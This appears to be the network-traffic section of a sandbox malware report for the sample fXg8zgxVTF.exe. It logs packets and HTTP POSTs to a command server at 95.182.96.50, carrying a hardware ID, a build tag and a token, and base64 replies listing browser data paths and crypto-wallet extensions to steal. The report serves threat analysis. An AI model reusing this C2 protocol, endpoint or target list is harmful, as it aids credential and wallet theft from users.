Oct 24, 2024 13:54:24.579619884 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579626083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579633951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579638004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579649925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579660892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579667091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579670906 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579683065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579691887 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579699993 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579705000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579720020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579720974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579730034 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579735994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579751968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579757929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579768896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579777002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579786062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579787016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579806089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579807997 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579818964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:24.579827070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579834938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:24.579852104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:25.070251942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:25.070281982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:25.075596094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:25.075690031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:25.357966900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:25.358088017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:25.407032967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:25.412636042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:25.641701937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:25.641726971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:25.641753912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:25.641791105 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:25.641829967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:25.644329071 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:25.650573969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:25.878628969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:25.878705025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:25.894679070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:25.901057005 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.160271883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.160336018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.551328897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.551328897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.557046890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557065010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557077885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557101965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557113886 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557125092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.557126999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557147980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.557153940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557158947 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.557168007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557180882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557204962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557205915 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.557230949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557240009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.557245970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557257891 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.557259083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557286024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557287931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.557300091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557312965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557315111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.557347059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.557370901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.557440996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557454109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557466030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.557514906 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.562690020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.562715054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.562764883 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.562792063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.562880039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.562928915 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.562932968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563040972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563091040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563097000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.563175917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563190937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563226938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.563240051 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.563278913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563292980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563304901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563329935 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.563330889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563340902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:26.563345909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563374043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563385963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563396931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563420057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563431978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563442945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563457966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563488960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563503027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563513994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563534975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563546896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563620090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563702106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563714027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563728094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563810110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.563822031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568150997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568165064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568192959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568205118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568217993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568240881 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568253040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568264008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568286896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568299055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568310022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568367958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568381071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568399906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568413973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568425894 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568551064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568563938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568588018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568599939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568614006 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568625927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568720102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568736076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568748951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568830013 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568845034 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568892956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568964958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.568978071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:26.569000959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:27.410845995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:27.410904884 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:27.450372934 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:27.455782890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:27.706806898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:27.706895113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:27.708287001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:27.713639975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:27.990761995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:27.992903948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:30.940407038 CEST	49714	80	192.168.2.6	95.182.96.50

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 13:54:22.034401894 CEST	53	52238	1.1.1.1	192.168.2.6

HTTP Request Dependency Graph

95.182.96.50

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49714	95.182.96.50	80	3796	C:\Users\user\Desktop\fXg8zgxVTF.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:54:11.693070889 CEST	87	OUT	GET / HTTP/1.1 Host: 95.182.96.50 Connection: Keep-Alive Cache-Control: no-cache
Oct 24, 2024 13:54:12.496311903 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:54:12.499922991 CEST	414	OUT	POST /2aced82320799c96.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBKFIEBGCAAFIEBFCAE Host: 95.182.96.50 Content-Length: 215 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 35 41 30 41 43 32 38 37 30 35 32 34 35 38 35 30 34 38 39 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 69 6e 74 65 61 6d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 2d 2d 0d 0a Data Ascii: ------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="hwid"0C5A0AC287052458504893------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="build"mainteam------GCBKFIEBGCAAFIEBFCAE--
Oct 24, 2024 13:54:12.911591053 CEST	407	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:12 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 6a 4d 7a 59 57 59 35 59 54 68 69 4d 6d 59 78 4d 7a 63 35 4e 6d 49 78 4e 57 55 79 59 54 4d 7a 4e 44 5a 6b 4d 57 52 68 4d 44 41 32 5a 47 59 77 5a 6a 4d 30 5a 6d 52 69 4d 6d 45 31 4f 44 68 6c 5a 6a 4e 68 4e 57 49 30 4f 44 63 31 59 7a 55 35 4f 44 4d 34 4d 32 5a 6c 4e 32 5a 6d 59 6a 56 6a 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MjMzYWY5YThiMmYxMzc5NmIxNWUyYTMzNDZkMWRhMDA2ZGYwZjM0ZmRiMmE1ODhlZjNhNWI0ODc1YzU5ODM4M2ZlN2ZmYjVjfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDF8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Oct 24, 2024 13:54:12.915007114 CEST	467	OUT	POST /2aced82320799c96.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJKKKJJJKJKFHJJJJEC Host: 95.182.96.50 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 2d 2d 0d 0a Data Ascii: ------JKJKKKJJJKJKFHJJJJECContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------JKJKKKJJJKJKFHJJJJECContent-Disposition: form-data; name="message"browsers------JKJKKKJJJKJKFHJJJJEC--
Oct 24, 2024 13:54:13.150583029 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:13 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Oct 24, 2024 13:54:13.150635958 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Oct 24, 2024 13:54:13.152333975 CEST	466	OUT	POST /2aced82320799c96.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDGDGDHDGDBFIDHDBAF Host: 95.182.96.50 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 2d 2d 0d 0a Data Ascii: ------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="message"plugins------KJDGDGDHDGDBFIDHDBAF--
Oct 24, 2024 13:54:13.384948015 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:13 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: 